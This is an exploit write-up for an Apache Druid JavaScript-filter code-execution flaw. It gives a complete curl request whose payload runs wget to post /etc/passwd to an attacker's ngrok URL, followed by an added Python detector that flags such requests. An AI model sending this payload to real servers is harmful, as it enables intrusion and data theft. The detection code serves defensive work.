Reference: pikpikcu
First, download and run a temporary HTTP server (for example Python's SimpleHTTPServer) to receive the callback.
Example: python3 file.py 1337
Next, expose that port with ngrok, for example: ngrok http 1337
Next, send the following POST request to the redacted target (YOUR_NGROK_URL in the payload is a placeholder for the ngrok URL from the previous step):
curl "http://redacted.com/druid/indexer/v1/sampler?for=example-manifest" \
  -H 'Content-Type: application/json' \
  --data '{
  "type": "index",
  "spec": {
    "type": "index",
    "ioConfig": {
      "type": "index",
      "inputSource": {"type": "http", "uris": ["https://druid.apache.org/data/example-manifests.tsv"]},
      "inputFormat": {"type": "tsv", "findColumnsFromHeader": true}
    },
    "dataSchema": {
      "dataSource": "sample",
      "timestampSpec": {"column": "timestamp", "missingValue": "2010-01-01T00:00:00Z"},
      "dimensionsSpec": {},
      "transformSpec": {
        "transforms": [],
        "filter": {
          "type": "javascript",
          "function": "function(value){return java.lang.Runtime.getRuntime().exec(\"wget --post-file /etc/passwd YOUR_NGROK_URL\")}",
          "dimension": "added",
          "": {"enabled": "true"}
        }
      }
    },
    "type": "index",
    "tuningConfig": {"type": "index"}
  },
  "samplerConfig": {"numRows": 50, "timeoutMs": 10000}
}'
If the target is vulnerable, the POST request (with the file contents as its body) will show up in your server's log.
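From the defender's side, the request above is easy to recognise in a reverse proxy, WAF or request log: a Druid ingestion or sampler spec should not normally carry a "javascript" filter whose function body calls a JVM process-execution API, and the empty-name key with "enabled" is the request trying to switch server-side JavaScript on for itself. The following Python is an added example, not part of the original write-up or pikpikcu's code; the function names, the severity scheme and the sample bodies are my own, and the sample request is constructed to mirror the shape shown above with the command string replaced by a placeholder.

```python
import json
import re

# Constructed sample: the shape of the sampler request in the write-up above,
# with the executed command replaced by a placeholder.
SAMPLE_REQUEST = json.dumps({
    "type": "index",
    "spec": {
        "type": "index",
        "ioConfig": {
            "type": "index",
            "inputSource": {"type": "http", "uris": ["https://example.invalid/data.tsv"]},
            "inputFormat": {"type": "tsv", "findColumnsFromHeader": True},
        },
        "dataSchema": {
            "dataSource": "sample",
            "timestampSpec": {"column": "timestamp", "missingValue": "2010-01-01T00:00:00Z"},
            "dimensionsSpec": {},
            "transformSpec": {
                "transforms": [],
                "filter": {
                    "type": "javascript",
                    "function": "function(value){return java.lang.Runtime.getRuntime().exec(\"PLACEHOLDER_COMMAND\")}",
                    "dimension": "added",
                    "": {"enabled": "true"},
                },
            },
        },
        "tuningConfig": {"type": "index"},
    },
    "samplerConfig": {"numRows": 50, "timeoutMs": 10000},
})

# Constructed benign request: an ordinary selector filter, no JavaScript at all.
BENIGN_REQUEST = json.dumps({
    "type": "index",
    "spec": {"dataSchema": {"transformSpec": {
        "filter": {"type": "selector", "dimension": "added", "value": "x"}}}},
})

# Substrings in a JavaScript function body that indicate host-level code execution
# rather than a per-row filter or aggregation.
EXEC_PATTERN = re.compile(
    r"java\.lang\.Runtime|getRuntime\(\)|ProcessBuilder|java\.lang\.reflect", re.I)


def find_javascript_specs(body):
    """Walk a Druid request body (JSON text) and return a list of findings.

    Every object with "type": "javascript" is reported (filters, aggregators and
    extraction functions all use that shape); the severity is raised to "high"
    when the function body references a process-execution API or when the
    object carries the empty-name key that tries to enable JavaScript per request.
    """
    findings = []

    def walk(node, path):
        if isinstance(node, dict):
            if node.get("type") == "javascript":
                fn = node.get("function", "")
                exec_hit = EXEC_PATTERN.search(fn) is not None
                config_override = isinstance(node.get(""), dict) and "enabled" in node[""]
                reasons = []
                if exec_hit:
                    reasons.append("function body references a JVM process-execution API")
                if config_override:
                    reasons.append("empty-name key tries to enable JavaScript per request")
                if not reasons:
                    reasons.append("server-side JavaScript spec present")
                findings.append({
                    "path": path,
                    "severity": "high" if (exec_hit or config_override) else "medium",
                    "reason": "; ".join(reasons),
                })
            for key, value in node.items():
                walk(value, f"{path}.{key}" if key else f"{path}.<empty>")
        elif isinstance(node, list):
            for i, item in enumerate(node):
                walk(item, f"{path}[{i}]")

    walk(json.loads(body), "$")
    return findings


def classify_request(body):
    """Return 'block', 'review' or 'allow' for one captured request body."""
    try:
        findings = find_javascript_specs(body)
    except (ValueError, TypeError):
        return "review"  # unparsable JSON deserves a look, not an automatic block
    if any(f["severity"] == "high" for f in findings):
        return "block"
    return "review" if findings else "allow"


if __name__ == "__main__":
    for finding in find_javascript_specs(SAMPLE_REQUEST):
        print(finding)
    print(classify_request(SAMPLE_REQUEST), classify_request(BENIGN_REQUEST))
```

The walk reports the JSON path of each hit (here `$.spec.dataSchema.transformSpec.filter`), so an alert can point at the exact object. Any "javascript" spec is flagged at least as "review" because Druid only honours them when server-side JavaScript is enabled on the cluster (it is off by default); the per-request `"": {"enabled": "true"}` object in the write-up is precisely an attempt to bypass that setting, which is why it is scored "high" on its own.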